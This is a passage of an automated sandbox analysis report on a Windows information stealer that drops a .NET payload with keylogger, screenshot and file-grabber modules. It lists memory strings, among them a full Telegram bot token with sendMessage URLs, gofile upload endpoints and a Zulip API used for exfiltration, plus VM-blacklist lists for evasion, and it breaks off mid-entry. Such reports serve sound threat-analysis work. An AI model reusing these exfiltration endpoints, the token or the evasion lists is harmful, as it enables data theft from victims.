Source: LKxcbzlwkz.exe, 00000000.00000002.3000735536.00000000017D5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ip-score.com/checkip/C1%k.
Source: LKxcbzlwkz.exe, 00000000.00000002.3000653293.0000000000BF0000.00000004.00000020.00020000.00000000.sdmp, LKxcbzlwkz.exe, 00000000.00000003.2062832927.0000000000BF0000.00000004.00000020.00020000.00000000.sdmp, LKxcbzlwkz.exe, 00000000.00000003.2063068490.0000000000BF0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ip-score.com/checkip/LMEM
Source: LKxcbzlwkz.exe, 00000000.00000002.3000322888.0000000000BC4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ip-score.com/checkip/TTC:
Source: LKxcbzlwkz.exe, 00000000.00000002.3000322888.0000000000BA4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ip-score.com/checkip/W
Source: LKxcbzlwkz.exe, 00000000.00000003.2062832927.0000000000BF0000.00000004.00000020.00020000.00000000.sdmp, LKxcbzlwkz.exe, 00000000.00000003.2063068490.0000000000BF0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ip-score.com/checkip/fic
Source: LKxcbzlwkz.exe, 00000000.00000002.3000322888.0000000000BA4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ip-score.com/checkip/ificates
Source: LKxcbzlwkz.exe, 00000000.00000003.2062832927.0000000000BF0000.00000004.00000020.00020000.00000000.sdmp, LKxcbzlwkz.exe, 00000000.00000003.2063068490.0000000000BF0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ip-score.com/checkip/n
Source: LKxcbzlwkz.exe, 00000000.00000002.3000322888.0000000000BA4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ip-score.com/checkip/oft
Source: LKxcbzlwkz.exe, 00000000.00000003.2062832927.0000000000BF0000.00000004.00000020.00020000.00000000.sdmp, LKxcbzlwkz.exe, 00000000.00000003.2063068490.0000000000BF0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ip-score.com/checkip/yiLkZ
Source: JOUNLV.exe, 00000001.00000002.2018670579.000001BB4805A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://james.newtonking.com/projects/json
Source: JOUNLV.exe, 00000001.00000002.2024186074.000001BB50B90000.00000004.08000000.00040000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB47E93000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB4805A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0A
Source: JOUNLV.exe, 00000001.00000002.2024186074.000001BB50B90000.00000004.08000000.00040000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB47E93000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB4805A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0C
Source: JOUNLV.exe, 00000001.00000002.2024186074.000001BB50B90000.00000004.08000000.00040000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB47E93000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB4805A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0O
Source: JOUNLV.exe, 00000001.00000002.2024186074.000001BB50B90000.00000004.08000000.00040000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB47E93000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB4805A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0X
Source: JOUNLV.exe, 00000001.00000002.2015535093.000001BB37E21000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: JOUNLV.exe, 00000001.00000002.2015535093.000001BB37FA4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://store6.gofile.io
Source: JOUNLV.exe, 00000001.00000002.2015535093.000001BB381D7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://szurubooru.zulipchat.com
Source: LKxcbzlwkz.exe, 00000000.00000002.3000735536.00000000017D5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.autoitscript.com/autoit3/files/beta/autoit/archive/sqlite/SQLite3
Source: JOUNLV.exe, 00000001.00000002.2024186074.000001BB50B90000.00000004.08000000.00040000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB47E93000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB4805A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.digicert.com/CPS0
Source: tmpEFE0.tmp.dat.1.dr, tmp555.tmp.dat.1.dr | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: JOUNLV.exe, 00000001.00000002.2023716769.000001BB50AE0000.00000004.08000000.00040000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB481CB000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB47E93000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/binaryformatter
Source: JOUNLV.exe, 00000001.00000002.2018670579.000001BB47E93000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/dotnet-warnings/
Source: JOUNLV.exe, 00000001.00000002.2023716769.000001BB50AE0000.00000004.08000000.00040000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB481CB000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB47E93000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/serializationformat-binary-obsolete
Source: JOUNLV.exe, 00000001.00000002.2015535093.000001BB37FA4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.gofile.io
Source: JOUNLV.exe, 00000001.00000002.2015535093.000001BB37FA4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.gofile.io/
Source: JOUNLV.exe, 00000001.00000002.2015535093.000001BB37FA4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.gofile.io/servers
Source: JOUNLV.exe, 00000001.00000002.2015535093.000001BB38175000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2015535093.000001BB37FA4000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2015535093.000001BB37E7C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org
Source: JOUNLV.exe, 00000001.00000002.2015535093.000001BB37EFD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot
Source: JOUNLV.exe, 00000001.00000002.2015535093.000001BB37EFD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot7944498476:AAFDMdaCzUgaTzRefjkf7TykHhwwmm5XuCI/getMe
Source: JOUNLV.exe, 00000001.00000002.2015535093.000001BB38175000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot7944498476:AAFDMdaCzUgaTzRefjkf7TykHhwwmm5XuCI/sendMessage
Source: JOUNLV.exe, 00000001.00000002.2015535093.000001BB37FA4000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2015535093.000001BB381AC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot7944498476:AAFDMdaCzUgaTzRefjkf7TykHhwwmm5XuCI/sendMessage?chat_id=-4556
Source: tmpEFE0.tmp.dat.1.dr, tmp555.tmp.dat.1.dr | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: tmpEFE0.tmp.dat.1.dr, tmp555.tmp.dat.1.dr | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: tmpEFE0.tmp.dat.1.dr, tmp555.tmp.dat.1.dr | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: tmpEFE0.tmp.dat.1.dr, tmp555.tmp.dat.1.dr | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: tmpEFE0.tmp.dat.1.dr, tmp555.tmp.dat.1.dr | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: tmpEFE0.tmp.dat.1.dr, tmp555.tmp.dat.1.dr | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: JOUNLV.exe, 00000001.00000002.2024186074.000001BB50B90000.00000004.08000000.00040000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB47E93000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB4805A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/JamesNK/Newtonsoft.Json
Source: JOUNLV.exe, 00000001.00000002.2023716769.000001BB50AE0000.00000004.08000000.00040000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB481CB000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2015535093.000001BB37FA4000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB47E93000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/dotnet/runtime
Source: JOUNLV.exe, 00000001.00000002.2023716769.000001BB50AE0000.00000004.08000000.00040000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB481CB000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2015535093.000001BB37FA4000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB47E93000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/dotnet/runtime8
Source: JOUNLV.exe, 00000001.00000002.2015535093.000001BB38567000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2015451084.000001BB37DC0000.00000004.08000000.00040000.00000000.sdmp | String found in binary or memory: https://github.com/icsharpcode/SharpZipLib
Source: JOUNLV.exe.0.dr | String found in binary or memory: https://github.com/kgnfth
Source: JOUNLV.exe, 00000001.00000002.2015535093.000001BB37FA4000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2015535093.000001BB37E73000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2015535093.000001BB37ECD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://gofile.io/d/liMaKC
Source: JOUNLV.exe, 00000001.00000002.2015535093.000001BB381CC000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2015535093.000001BB37EC9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://gofile.io/d/liMaKC)
Source: LKxcbzlwkz.exe, 00000000.00000002.3000322888.0000000000BC4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ip-score.com/
Source: LKxcbzlwkz.exe, 00000000.00000003.2062832927.0000000000BE9000.00000004.00000020.00020000.00000000.sdmp, LKxcbzlwkz.exe, 00000000.00000002.3000322888.0000000000BD8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ip-score.com/checkip/
Source: LKxcbzlwkz.exe, 00000000.00000002.3000653293.0000000000BF0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ip-score.com/checkip/2
Source: LKxcbzlwkz.exe, 00000000.00000002.3000653293.0000000000BF0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ip-score.com/checkip/65
                          Source: LKxcbzlwkz.exe, 00000000.00000002.3000322888.0000000000B3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ip-score.com/checkip/C:
                          Source: LKxcbzlwkz.exe, 00000000.00000002.3000322888.0000000000BC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ip-score.com/checkip/HC:
                          Source: LKxcbzlwkz.exe, 00000000.00000002.3000653293.0000000000BF0000.00000004.00000020.00020000.00000000.sdmp, LKxcbzlwkz.exe, 00000000.00000003.2062832927.0000000000BF0000.00000004.00000020.00020000.00000000.sdmp, LKxcbzlwkz.exe, 00000000.00000003.2063068490.0000000000BF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ip-score.com/checkip/LMEM
                          Source: LKxcbzlwkz.exe, 00000000.00000002.3000322888.0000000000BA4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ip-score.com/checkip/O
                          Source: LKxcbzlwkz.exe, 00000000.00000002.3000322888.0000000000B3B000.00000004.00000020.00020000.00000000.sdmp, LKxcbzlwkz.exe, 00000000.00000002.3000322888.0000000000BC4000.00000004.00000020.00020000.00000000.sdmp, LKxcbzlwkz.exe, 00000000.00000003.2062832927.0000000000BE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ip-score.com/checkip/TTC:
                          Source: LKxcbzlwkz.exe, 00000000.00000002.3000653293.0000000000BF0000.00000004.00000020.00020000.00000000.sdmp, LKxcbzlwkz.exe, 00000000.00000003.2062832927.0000000000BF0000.00000004.00000020.00020000.00000000.sdmp, LKxcbzlwkz.exe, 00000000.00000003.2063068490.0000000000BF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ip-score.com/checkip/erse
                          Source: LKxcbzlwkz.exe, 00000000.00000002.3000322888.0000000000BC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ip-score.com/ows
                          Source: JOUNLV.exe, 00000001.00000002.2015535093.000001BB37E21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com
                          Source: LKxcbzlwkz.exe, 00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmp, aut66E4.tmp.0.dr, JOUNLV.exe.0.drString found in binary or memory: https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/
                          Source: LKxcbzlwkz.exe, 00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2015535093.000001BB37E21000.00000004.00000800.00020000.00000000.sdmp, aut66E4.tmp.0.dr, JOUNLV.exe.0.drString found in binary or memory: https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/MachineGuid.txt
                          Source: LKxcbzlwkz.exe, 00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2015535093.000001BB37E21000.00000004.00000800.00020000.00000000.sdmp, aut66E4.tmp.0.dr, JOUNLV.exe.0.drString found in binary or memory: https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/gpu_list.txt
                          Source: LKxcbzlwkz.exe, 00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2015535093.000001BB37E21000.00000004.00000800.00020000.00000000.sdmp, aut66E4.tmp.0.dr, JOUNLV.exe.0.drString found in binary or memory: https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/ip_list.txt
                          Source: LKxcbzlwkz.exe, 00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2015535093.000001BB37E21000.00000004.00000800.00020000.00000000.sdmp, aut66E4.tmp.0.dr, JOUNLV.exe.0.drString found in binary or memory: https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/pc_name_list.txt
                          Source: LKxcbzlwkz.exe, 00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2015535093.000001BB37E21000.00000004.00000800.00020000.00000000.sdmp, aut66E4.tmp.0.dr, JOUNLV.exe.0.drString found in binary or memory: https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/pc_username_list.txt
                          Source: LKxcbzlwkz.exe, 00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2015535093.000001BB37E21000.00000004.00000800.00020000.00000000.sdmp, aut66E4.tmp.0.dr, JOUNLV.exe.0.drString found in binary or memory: https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/processes_list.txt
                          Source: JOUNLV.exe, 00000001.00000002.2024985170.000001BB50D65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/icsharpcode/SharpZipLib/33f64eb0f28cdd2b084cb822fcc224c7c5aba553/
                          Source: JOUNLV.exe, 00000001.00000002.2015535093.000001BB37FA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store6.gofile.io
                          Source: JOUNLV.exe, 00000001.00000002.2015535093.000001BB37FA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store6.gofile.io/X
                          Source: JOUNLV.exe, 00000001.00000002.2015535093.000001BB37FA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store6.gofile.io/uploadfile
                          Source: tmp42BD.tmp.dat.1.drString found in binary or memory: https://support.mozilla.org
                          Source: tmp42BD.tmp.dat.1.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                          Source: tmp42BD.tmp.dat.1.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
                          Source: tmpF011.tmp.dat.1.dr, tmpF031.tmp.dat.1.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                          Source: tmpF011.tmp.dat.1.dr, tmpF031.tmp.dat.1.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                          Source: tmpF011.tmp.dat.1.dr, tmpF031.tmp.dat.1.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                          Source: tmpF011.tmp.dat.1.dr, tmpF031.tmp.dat.1.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                          Source: JOUNLV.exe, 00000001.00000002.2015535093.000001BB37FA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://szurubooru.zulipchat.com
                          Source: JOUNLV.exe, 00000001.00000002.2015535093.000001BB37EFD000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2015535093.000001BB381D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://szurubooru.zulipchat.com/api/v1/messages
                          Source: tmpEFE0.tmp.dat.1.dr, tmp555.tmp.dat.1.drString found in binary or memory: https://www.ecosia.org/newtab/
                          Source: tmpEFE0.tmp.dat.1.dr, tmp555.tmp.dat.1.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                          Source: tmp42BD.tmp.dat.1.drString found in binary or memory: https://www.mozilla.org
                          Source: tmp42BD.tmp.dat.1.drString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                          Source: tmp42BD.tmp.dat.1.drString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                          Source: History.txt0.1.drString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
                          Source: tmpDCFB.tmp.dat.1.dr, tmp42BD.tmp.dat.1.drString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                          Source: tmp42BD.tmp.dat.1.drString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                          Source: tmpDCFB.tmp.dat.1.dr, tmp42BD.tmp.dat.1.drString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                          Source: JOUNLV.exe, 00000001.00000002.2024186074.000001BB50B90000.00000004.08000000.00040000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB47E93000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB4805A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.newtonsoft.com/json
                          Source: JOUNLV.exe, 00000001.00000002.2018670579.000001BB4805A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.newtonsoft.com/jsonschema
                          Source: JOUNLV.exe, 00000001.00000002.2024186074.000001BB50B90000.00000004.08000000.00040000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB47E93000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB4805A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                          Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.4:49735 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.4:49733 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.4:49737 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.4:49732 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.4:49736 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.4:49734 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.138.68.212:443 -> 192.168.2.4:49738 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49739 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 45.112.123.126:443 -> 192.168.2.4:49742 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 31.14.70.249:443 -> 192.168.2.4:49743 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 50.17.0.11:443 -> 192.168.2.4:49751 version: TLS 1.2

                          Key, Mouse, Clipboard, Microphone and Screen Capturing

                          Source: Yara match | File source: Process Memory Space: LKxcbzlwkz.exe PID: 4924, type: MEMORYSTR
                          Source: JOUNLV.exe.0.dr, DesktopScreenshot.cs | .Net Code: Make
                          Source: aut66E4.tmp.0.dr, DesktopScreenshot.cs | .Net Code: Make
                          Source: JOUNLV.exe.0.dr, Keylogger.cs | .Net Code: SetHook
                          Source: JOUNLV.exe.0.dr, Keylogger.cs | .Net Code: KeyboardLayout
                          Source: aut66E4.tmp.0.dr, Keylogger.cs | .Net Code: SetHook
                          Source: aut66E4.tmp.0.dr, Keylogger.cs | .Net Code: KeyboardLayout
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exe | Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\LKxcbzlwkz.exe (reported 6 times)
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exe | Code function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exe | Code function: 0_2_0046DC80 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exe | Code function: 0_2_0044C37A GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,SendInput
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | Window created: window name: CLIPBRDWNDCLASS
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exe | Code function: 0_2_0047C81C SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW

                          E-Banking Fraud

                          Source: Yara match | File source: Process Memory Space: LKxcbzlwkz.exe PID: 4924, type: MEMORYSTR

                          Spam, unwanted Advertisements and Ransom Demands

                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | File deleted: C:\Users\user\AppData\Local\cb60c5e88147715fe2ed1a9bb45bba55\user@724536_en-CH\Grabber\DRIVE-C\Users\user\Desktop\YPSIACHYXW.docx
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | File deleted: C:\Users\user\AppData\Local\cb60c5e88147715fe2ed1a9bb45bba55\user@724536_en-CH\Grabber\DRIVE-C\Users\user\Desktop\NIKHQAIQAU.pdf
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | File deleted: C:\Users\user\AppData\Local\cb60c5e88147715fe2ed1a9bb45bba55\user@724536_en-CH\Grabber\DRIVE-C\Users\user\Desktop\WUTJSCBCFX.docx

                          System Summary

                          Source: 1.0.JOUNLV.exe.1bb35cc0000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                          Source: 00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                          Source: 00000001.00000002.2015535093.000001BB37EFD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                          Source: 00000001.00000000.1763580624.000001BB35CC2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY | Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                          Source: Process Memory Space: LKxcbzlwkz.exe PID: 4924, type: MEMORYSTR | Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                          Source: Process Memory Space: JOUNLV.exe PID: 4828, type: MEMORYSTR | Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                          Source: C:\Users\user\AppData\Local\Temp\aut66E4.tmp, type: DROPPED | Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe, type: DROPPED | Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                          Source: user@724536_en-CH.zip.1.dr | Zip Entry: encrypted (reported for 70 entries of the archive)
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exe | Code function: 0_2_00431BE8 GetFullPathNameW,__swprintf,_wcslen,CreateDirectoryW,CreateFileW,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exe | Code function: 0_2_00446313 DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exe | Code function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exe | Code function: 0_2_004096A0
